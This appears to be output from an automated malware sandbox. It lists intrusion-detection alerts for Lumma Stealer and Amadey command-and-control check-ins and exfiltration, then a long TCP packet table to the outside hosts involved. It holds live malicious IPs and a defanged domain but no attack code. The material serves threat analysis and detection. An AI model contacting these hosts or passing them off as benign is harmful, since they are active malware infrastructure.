2024-12-18T13:43:03.443375+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	50099	104.21.64.80	443	TCP
2024-12-18T13:43:03.443375+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	50099	104.21.64.80	443	TCP
2024-12-18T13:43:04.937462+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50103	104.21.64.80	443	TCP
2024-12-18T13:43:04.937462+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50103	104.21.64.80	443	TCP
2024-12-18T13:43:07.671503+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	50103	104.21.64.80	443	TCP
2024-12-18T13:43:08.962327+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50106	104.21.64.80	443	TCP
2024-12-18T13:43:08.962327+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50106	104.21.64.80	443	TCP
2024-12-18T13:43:11.848249+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50108	104.21.64.80	443	TCP
2024-12-18T13:43:11.848249+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50108	104.21.64.80	443	TCP
2024-12-18T13:43:15.075635+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.8	50109	185.215.113.43	80	TCP
2024-12-18T13:43:16.286870+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50110	104.21.64.80	443	TCP
2024-12-18T13:43:16.286870+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50110	104.21.64.80	443	TCP
2024-12-18T13:43:19.298885+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50112	104.21.64.80	443	TCP
2024-12-18T13:43:19.298885+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50112	104.21.64.80	443	TCP
2024-12-18T13:43:23.733488+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.8	50114	104.21.64.80	443	TCP
2024-12-18T13:43:23.733488+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	50114	104.21.64.80	443	TCP
2024-12-18T13:43:24.730899+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	50114	104.21.64.80	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:38:05.190968037 CET	49704	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:05.310774088 CET	80	49704	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:05.310978889 CET	49704	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:05.319262028 CET	49704	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:05.438838959 CET	80	49704	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:06.643249989 CET	80	49704	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:06.643333912 CET	49704	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:08.150836945 CET	49704	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:08.151176929 CET	49707	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:08.270724058 CET	80	49704	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:08.270811081 CET	49704	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:08.270832062 CET	80	49707	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:08.270916939 CET	49707	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:08.271142960 CET	49707	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:08.390525103 CET	80	49707	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:09.620628119 CET	80	49707	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:09.620702028 CET	49707	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:09.630383968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:09.750719070 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:09.750828028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:09.837518930 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:09.957868099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076076031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076180935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076184988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.076200008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076234102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.076253891 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.076364994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076378107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076390982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076422930 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.076495886 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.076761007 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076775074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076788902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076802015 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.076818943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.076852083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.195729971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.195869923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.195920944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.199907064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.199960947 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.200090885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.200135946 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.268110037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.268281937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.268404961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.272548914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.272804976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.272876024 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.281236887 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.283782005 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.284267902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.284316063 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.284343004 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.284379959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.292119026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.292311907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.292382002 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.300519943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.300858974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.300951958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.308867931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.308964014 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.309036970 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.317392111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.317405939 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.317464113 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.325628042 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.325851917 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.325925112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.333340883 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.333436012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.333513975 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.340960026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.341034889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.341105938 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.348191977 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.348341942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.348411083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.355746031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.359755039 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.460102081 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.460334063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.460431099 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.462393045 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.462450981 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.462487936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.462533951 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.467005968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.467072964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.467155933 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.471615076 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.471750021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.471781969 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.471807003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.476217031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.476418018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.476492882 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.480737925 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.480832100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.480931997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.481018066 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.485251904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.485392094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.485447884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.489809036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.489959955 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.490020037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.494366884 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.494472027 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.494529009 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.498931885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.499036074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.499088049 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.503365993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.503447056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.503505945 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.507889032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.507906914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.507966995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.512340069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.512438059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.512492895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.516808987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.516901016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.516951084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.521315098 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.521526098 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.521585941 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.525971889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.526024103 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.526087999 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.526134968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.530498028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.530571938 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.530627012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.534950972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.535149097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.535223961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.539391994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.539596081 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.539658070 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.544080973 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.544186115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.544260025 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.548481941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.548716068 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.548779011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.552933931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.553023100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.553075075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.557491064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.557812929 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.557872057 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.561943054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.562067032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.562144041 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.652821064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.653042078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.653114080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.654603004 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.654616117 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.654689074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.658370972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.658385992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.658443928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.662307024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.662420988 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.663304090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.665415049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.665512085 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.665566921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.668839931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.668910027 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.668977022 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.672399998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.672662973 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.672826052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.675888062 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.676026106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.676084995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.679208994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.679275990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.679346085 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.679395914 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.681946039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.682215929 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.682269096 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.685173988 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.685187101 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.685245037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.688328028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.688380003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.688438892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.691234112 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.691309929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.691350937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.691399097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.694276094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.694339037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.694402933 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.697292089 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.697305918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.697355032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.697395086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.700278044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.700401068 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.700453043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.703362942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.703424931 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.703459978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.703505039 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.706233978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.706410885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.706466913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.709403038 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.709415913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.709501028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.712290049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.712431908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.712479115 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.715842962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.715948105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.716008902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.718478918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.718529940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.718591928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.721373081 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.721476078 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.721621037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.721725941 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.724423885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.724750042 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.724798918 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.727365017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.727426052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.727473021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.727514982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.730469942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.730494976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.730526924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.730544090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.733355999 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.733417988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.733450890 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.733501911 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.736733913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.736895084 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.736936092 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.739425898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.739473104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.739613056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.739738941 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.742420912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.742468119 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.742630959 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.742770910 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.745512962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.745743990 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.745793104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.748436928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.748490095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.748532057 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.748572111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.751486063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.751550913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.751575947 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.751645088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.754471064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.754570007 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.754626036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.757800102 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.757816076 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.757862091 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.760919094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.760970116 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.761032104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.761071920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.763552904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.763758898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.763783932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.763839006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.766539097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.766592026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.766602993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.766640902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.769664049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.769886017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.769937992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.772609949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.772696018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.772764921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.775500059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.775544882 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.844779968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.844882011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.845029116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.845102072 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.845875025 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.845921993 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.846138000 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.846185923 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.848304987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.848354101 CET	49708	80	192.168.2.8	31.41.244.11
